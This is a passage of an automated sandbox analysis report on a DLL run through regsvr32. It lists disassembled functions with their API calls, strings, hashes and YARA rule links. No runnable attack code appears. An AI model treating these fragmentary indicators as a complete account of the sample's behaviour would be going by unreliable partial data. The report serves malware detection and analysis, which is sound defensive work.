Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94

Uniqueness

Uniqueness Score: -1.00%

Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 100222EA
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B

Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292

Strings

Software\Classes\, xrefs: 1002232B

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32 ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32 ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32 ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32 ref: 1002B313

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
RegCloseKey.ADVAPI32(?), ref: 1002AB77
RegCloseKey.ADVAPI32(?), ref: 1002AB81

Strings

software, xrefs: 1002AB10

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?), ref: 1002B013
__CxxThrowException@8.LIBCMT ref: 1002B01D

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041

Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39

_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 1002A956
GetSysColor.USER32(00000010), ref: 1002A95D
GetSysColor.USER32(00000014), ref: 1002A964
GetSysColor.USER32(00000012), ref: 1002A96B
GetSysColor.USER32(00000006), ref: 1002A972
GetSysColorBrush.USER32(0000000F), ref: 1002A97F
GetSysColorBrush.USER32(00000006), ref: 1002A986

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,71FAB912), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,71FAB912), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 1002A8E3
GetDlgCtrlID.USER32(00000000), ref: 1002A8F7
GetWindowLongA.USER32 ref: 1002A907
GetWindowRect.USER32 ref: 1002A919
PtInRect.USER32(?,?,?), ref: 1002A929
GetWindow.USER32(?,00000005), ref: 1002A936

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98

Uniqueness

Uniqueness Score: -1.00%

Function 10001D60, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10022D72: _memset.LIBCMT ref: 10022D8E

_strlen.LIBCMT ref: 10001E7F
_strlen.LIBCMT ref: 10001EF1
_strlen.LIBCMT ref: 10001F36
LoadIconA.USER32 ref: 10001F81

Strings

127.0.0.1, xrefs: 10001E68, 10001E7A, 10001E8E

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1002099A
_memset.LIBCMT ref: 10020A12
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
LoadBitmapA.USER32 ref: 10020A8D

Strings

, xrefs: 100209F3

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50

Uniqueness

Uniqueness Score: -1.00%

Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
GetSystemMetrics.USER32 ref: 10025168
GetSystemMetrics.USER32 ref: 1002516F

Strings

B, xrefs: 1002512F
DISPLAY, xrefs: 1002518C

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1003748E

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

csm, xrefs: 10037487
MOC, xrefs: 10037480

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 10002AB0, Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
SetLastError.KERNEL32(0000007E), ref: 10002B47

Strings

@t Ot, xrefs: 10002B05

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead
String ID: @t Ot
API String ID: 4100373531-710815163
Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(049F15E8), ref: 100330C1

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1004370E
_Fputc.LIBCPMT ref: 10043762
_Fputc.LIBCPMT ref: 10043890

Strings

, xrefs: 1004381A

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
